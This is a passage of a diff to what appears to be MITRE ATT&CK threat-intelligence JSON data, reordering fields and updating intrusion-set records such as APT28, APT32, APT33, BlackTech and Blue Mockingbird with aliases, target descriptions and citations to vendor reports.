"modified": "2020-01-17T16:46:19.274Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3",
@@ -185483,8 +213319,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.244Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7708ac15-4beb-4863-a1a5-da2d63fb8a3c",
@@ -185504,8 +213340,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:36:43.778Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -185518,6 +213354,42 @@
"modified": "2017-06-01T00:00:00.000Z",
"created": "2017-06-01T00:00:00.000Z"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0099",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0099"
+ },
+ {
+ "source_name": "Blind Eagle",
+ "description": "(Citation: QiAnXin APT-C-36 Feb2019)"
+ },
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "name": "APT-C-36",
+ "type": "intrusion-set",
+ "id": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "aliases": [
+ "APT-C-36",
+ "Blind Eagle"
+ ],
+ "modified": "2020-05-07T22:53:31.155Z",
+ "created": "2020-05-05T18:53:08.166Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Jose Luis S\u00e1nchez Martinez"
+ ]
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662",
@@ -185789,9 +213661,9 @@
"description": "(Citation: Dark Reading Codoso Feb 2015)"
},
{
- "source_name": "FireEye APT19",
+ "url": "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
"description": "Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html"
+ "source_name": "FireEye APT19"
},
{
"url": "https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/",
@@ -185804,9 +213676,9 @@
"url": "https://www.fireeye.com/current-threats/apt-groups.html#apt19"
},
{
- "source_name": "Unit 42 C0d0so0 Jan 2016",
+ "url": "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/",
"description": "Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/"
+ "source_name": "Unit 42 C0d0so0 Jan 2016"
},
{
"source_name": "Dark Reading Codoso Feb 2015",
@@ -185821,15 +213693,31 @@
"Codoso Team",
"Sunshop Group"
],
- "modified": "2020-03-30T18:47:06.466Z",
+ "modified": "2020-06-20T22:48:29.397Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.3",
"x_mitre_contributors": [
"FS-ISAC",
"Darren Spruell"
- ]
+ ],
+ "x_mitre_version": "1.3"
},
{
+ "created": "2017-05-31T21:31:48.664Z",
+ "modified": "2020-03-30T15:28:00.965Z",
+ "aliases": [
+ "APT28",
+ "SNAKEMACKEREL",
+ "Swallowtail",
+ "Group 74",
+ "Sednit",
+ "Sofacy",
+ "Pawn Storm",
+ "Fancy Bear",
+ "STRONTIUM",
+ "Tsar Team",
+ "Threat Group-4127",
+ "TG-4127"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -185978,28 +213866,12 @@
"source_name": "Microsoft STRONTIUM Aug 2019"
}
],
- "aliases": [
- "APT28",
- "SNAKEMACKEREL",
- "Swallowtail",
- "Group 74",
- "Sednit",
- "Sofacy",
- "Pawn Storm",
- "Fancy Bear",
- "STRONTIUM",
- "Tsar Team",
- "Threat Group-4127",
- "TG-4127"
- ],
- "modified": "2020-03-30T15:28:00.965Z",
- "created": "2017-05-31T21:31:48.664Z",
- "x_mitre_version": "2.3",
"x_mitre_contributors": [
"Drew Church, Splunk",
"Emily Ratliff, IBM",
"Richard Gold, Digital Shadows"
- ]
+ ],
+ "x_mitre_version": "2.3"
},
{
"type": "intrusion-set",
@@ -186198,6 +214070,14 @@
"x_mitre_version": "1.0"
},
{
+ "type": "intrusion-set",
+ "id": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "APT32",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -186221,48 +214101,47 @@
"description": "(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
+ "source_name": "FireEye APT32 May 2017",
"description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.",
- "source_name": "FireEye APT32 May 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
},
{
- "url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/",
+ "source_name": "Volexity OceanLotus Nov 2017",
"description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.",
- "source_name": "Volexity OceanLotus Nov 2017"
+ "url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/"
},
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
- "source_name": "Cybereason Oceanlotus May 2017",
+ "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
"url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018."
+ "source_name": "Cybereason Oceanlotus May 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based. (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017) (Citation: ESET OceanLotus)",
- "name": "APT32",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
- "type": "intrusion-set",
"aliases": [
"APT32",
"SeaLotus",
"OceanLotus",
"APT-C-00"
],
- "modified": "2020-03-30T20:26:08.527Z",
+ "modified": "2020-06-29T21:45:34.984Z",
"created": "2017-12-14T16:46:06.044Z",
"x_mitre_contributors": [
"Romain Dumont, ESET"
],
- "x_mitre_version": "2.2"
+ "x_mitre_version": "2.3"
},
{
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-07-01T15:48:20.759Z",
+ "aliases": [
+ "APT33",
+ "HOLMIUM",
+ "Elfin"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -186281,19 +214160,28 @@
"source_name": "APT33",
"description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)"
},
+ {
+ "source_name": "HOLMIUM",
+ "description": "(Citation: Microsoft Holmium June 2020)"
+ },
{
"source_name": "Elfin",
"description": "(Citation: Symantec Elfin Mar 2019)"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "source_name": "FireEye APT33 Sept 2017",
"description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.",
- "source_name": "FireEye APT33 Sept 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
},
{
- "url": "https://www.brighttalk.com/webcast/10703/275683",
+ "source_name": "FireEye APT33 Webinar Sept 2017",
"description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.",
- "source_name": "FireEye APT33 Webinar Sept 2017"
+ "url": "https://www.brighttalk.com/webcast/10703/275683"
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
},
{
"source_name": "Symantec Elfin Mar 2019",
@@ -186301,12 +214189,6 @@
"description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
}
],
- "aliases": [
- "APT33",
- "Elfin"
- ],
- "modified": "2020-03-30T20:36:41.050Z",
- "created": "2018-04-18T17:59:24.739Z",
"x_mitre_version": "1.3"
},
{
@@ -186352,19 +214234,19 @@
"description": "(Citation: FireEye APT37 Feb 2018)"
},
{
- "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "source_name": "FireEye APT37 Feb 2018",
"description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.",
- "source_name": "FireEye APT37 Feb 2018"
+ "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
},
{
- "source_name": "Securelist ScarCruft Jun 2016",
+ "url": "https://securelist.com/operation-daybreak/75100/",
"description": "Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.",
- "url": "https://securelist.com/operation-daybreak/75100/"
+ "source_name": "Securelist ScarCruft Jun 2016"
},
{
- "source_name": "Talos Group123",
+ "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.",
- "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
+ "source_name": "Talos Group123"
},
{
"url": "https://www.us-cert.gov/ncas/alerts/TA17-164A",
@@ -186397,12 +214279,12 @@
"Group123",
"TEMP.Reaper"
],
- "modified": "2020-03-30T18:49:39.063Z",
+ "modified": "2020-06-23T19:36:24.680Z",
"created": "2018-04-18T17:59:24.739Z",
+ "x_mitre_version": "1.4",
"x_mitre_contributors": [
"Valerii Marchuk, Cybersecurity Help s.r.o."
- ],
- "x_mitre_version": "1.4"
+ ]
},
{
"id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340",
@@ -186447,6 +214329,12 @@
"x_mitre_version": "1.2"
},
{
+ "created": "2019-02-19T16:01:38.585Z",
+ "modified": "2020-05-29T20:22:10.625Z",
+ "aliases": [
+ "APT39",
+ "Chafer"
+ ],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -186463,7 +214351,7 @@
},
{
"source_name": "Chafer",
- "description": "Activities associated with APT39 largely align with a group publicly referred to as Chafer.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)"
+ "description": "Activities associated with APT39 largely align with a group publicly referred to as Chafer.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: Dark Reading APT39 JAN 2019)"
},
{
"source_name": "FireEye APT39 Jan 2019",
@@ -186474,18 +214362,17 @@
"description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
"url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
"source_name": "Symantec Chafer Dec 2015"
+ },
+ {
+ "source_name": "Dark Reading APT39 JAN 2019",
+ "url": "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764",
+ "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020."
}
],
"name": "APT39",
"description": "[APT39](https://attack.mitre.org/groups/G0087) is an Iranian cyber espionage group that has been active since at least 2014. They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran's national priorities. (Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)",
"type": "intrusion-set",
"id": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
- "aliases": [
- "APT39",
- "Chafer"
- ],
- "modified": "2020-03-30T18:51:45.369Z",
- "created": "2019-02-19T16:01:38.585Z",
"x_mitre_version": "2.1"
},
{
@@ -186516,7 +214403,7 @@
"aliases": [
"APT41"
],
- "modified": "2020-03-30T15:29:01.228Z",
+ "modified": "2020-06-24T00:51:25.764Z",
"created": "2019-09-23T13:43:36.945Z",
"x_mitre_version": "1.1"
},
@@ -186525,7 +214412,7 @@
"id": "intrusion-set--a0cb9370-e39b-44d5-9f50-ef78e412b973",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Axiom",
- "description": "[Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)",
+ "description": "[Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -186578,14 +214465,6 @@
"x_mitre_version": "1.2"
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "BRONZE BUTLER",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -186594,25 +214473,30 @@
},
{
"source_name": "BRONZE BUTLER",
- "description": "(Citation: Trend Micro Daserf Nov 2017)"
+ "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019)"
},
{
"source_name": "REDBALDKNIGHT",
- "description": "(Citation: Trend Micro Daserf Nov 2017)"
+ "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Trend Micro Tick November 2019)"
},
{
"source_name": "Tick",
- "description": "(Citation: Trend Micro Daserf Nov 2017) (Citation: Symantec Tick Apr 2016)"
+ "description": "(Citation: Trend Micro Daserf Nov 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)"
},
{
- "source_name": "Trend Micro Daserf Nov 2017",
+ "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
"description": "Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER\u2019s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.",
- "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
+ "source_name": "Trend Micro Daserf Nov 2017"
},
{
- "source_name": "Secureworks BRONZE BUTLER Oct 2017",
+ "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
- "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ "source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
},
{
"source_name": "Symantec Tick Apr 2016",
@@ -186620,13 +214504,24 @@
"url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
+ "name": "BRONZE BUTLER",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "type": "intrusion-set",
"aliases": [
"BRONZE BUTLER",
"REDBALDKNIGHT",
"Tick"
],
- "modified": "2020-03-30T18:41:41.005Z",
+ "modified": "2020-06-25T20:54:52.793Z",
"created": "2018-01-16T16:13:52.465Z",
+ "x_mitre_contributors": [
+ "Trend Micro Incorporated"
+ ],
"x_mitre_version": "1.1"
},
{
@@ -186678,26 +214573,60 @@
],
"external_references": [
{
- "external_id": "G0097",
+ "external_id": "G0098",
"source_name": "mitre-attack",
- "url": "https://attack.mitre.org/groups/G0097"
+ "url": "https://attack.mitre.org/groups/G0098"
},
{
- "source_name": "Trend Micro Bouncing Golf 2019",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/",
- "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020."
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
}
],
- "description": "[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)",
- "name": "Bouncing Golf",
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017)",
+ "name": "BlackTech",
"type": "intrusion-set",
- "id": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd",
+ "id": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
"aliases": [
- "Bouncing Golf"
+ "BlackTech"
],
- "modified": "2020-03-26T20:58:44.722Z",
- "created": "2020-01-27T16:55:39.688Z",
- "x_mitre_version": "1.0"
+ "modified": "2020-05-06T18:12:23.832Z",
+ "created": "2020-05-05T18:36:45.970Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Tatsuya Daitoku, Cyber Defense Institute, Inc."
+ ]
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0108",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0108"
+ },
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)",
+ "name": "Blue Mockingbird",
+ "type": "intrusion-set",
+ "id": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "aliases": [
+ "Blue Mockingbird"
+ ],
+ "modified": "2020-06-25T13:59:09.596Z",
+ "created": "2020-05-26T20:09:39.139Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Tony Lambert, Red Canary"
+ ]
},
{
"type": "intrusion-set",
@@ -186754,41 +214683,41 @@
],
"modified": "2020-03-28T00:22:39.895Z",
"created": "2017-05-31T21:31:49.021Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Anastasios Pingios"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--7636484c-adc5-45d4-9bfe-c3e062fbc4a0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Charming Kitten",
- "description": "[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten](https://attack.mitre.org/groups/G0058) usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities. (Citation: ClearSky Charming Kitten Dec 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
+ "external_id": "G0058",
"source_name": "mitre-attack",
- "url": "https://attack.mitre.org/groups/G0058",
- "external_id": "G0058"
+ "url": "https://attack.mitre.org/groups/G0058"
},
{
"source_name": "Charming Kitten",
"description": "(Citation: ClearSky Charming Kitten Dec 2017)"
},
{
- "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf",
+ "source_name": "ClearSky Charming Kitten Dec 2017",
"description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
- "source_name": "ClearSky Charming Kitten Dec 2017"
+ "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
}
],
+ "description": "[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [[Charming Kitten](https://attack.mitre.org/groups/G0058) often tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities.(Citation: ClearSky Charming Kitten Dec 2017)",
+ "name": "Charming Kitten",
+ "type": "intrusion-set",
+ "id": "intrusion-set--92d5b3fd-3b39-438e-af68-770e447beada",
"aliases": [
"Charming Kitten"
],
- "modified": "2019-03-22T19:59:49.319Z",
- "created": "2018-01-16T16:13:52.465Z",
+ "modified": "2020-07-04T23:15:31.278Z",
+ "created": "2018-01-16T00:14:20.562Z",
"x_mitre_version": "1.0"
},
{
@@ -186866,9 +214795,9 @@
"description": "(Citation: Crowdstrike Global Threat Report Feb 2018)"
},
{
- "url": "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
+ "source_name": "Talos Cobalt Group July 2018",
"description": "Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.",
- "source_name": "Talos Cobalt Group July 2018"
+ "url": "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html"
},
{
"source_name": "PTSecurity Cobalt Group Aug 2017",
@@ -186921,7 +214850,7 @@
"Cobalt Gang",
"Cobalt Spider"
],
- "modified": "2020-03-28T21:25:27.125Z",
+ "modified": "2020-06-23T19:41:51.510Z",
"created": "2018-10-17T00:14:20.652Z",
"x_mitre_version": "1.2"
},
@@ -186987,15 +214916,15 @@
"description": "(Citation: Lookout Dark Caracal Jan 2018)"
},
{
- "source_name": "Lookout Dark Caracal Jan 2018",
+ "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf",
"description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.",
- "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf"
+ "source_name": "Lookout Dark Caracal Jan 2018"
}
],
"aliases": [
"Dark Caracal"
],
- "modified": "2020-03-30T18:54:29.365Z",
+ "modified": "2020-06-03T20:22:40.401Z",
"created": "2018-10-17T00:14:20.652Z",
"x_mitre_version": "1.2"
},
@@ -187032,10 +214961,45 @@
"aliases": [
"DarkHydrus"
],
- "modified": "2020-03-30T18:55:32.024Z",
+ "modified": "2020-05-15T15:44:47.629Z",
"created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_contributors": [
+ "Oleg Skulkin, Group-IB"
+ ],
"x_mitre_version": "1.2"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0105",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0105"
+ },
+ {
+ "source_name": "DarkVishnya",
+ "description": "(Citation: Securelist DarkVishnya Dec 2018)"
+ },
+ {
+ "source_name": "Securelist DarkVishnya Dec 2018",
+ "url": "https://securelist.com/darkvishnya/89169/",
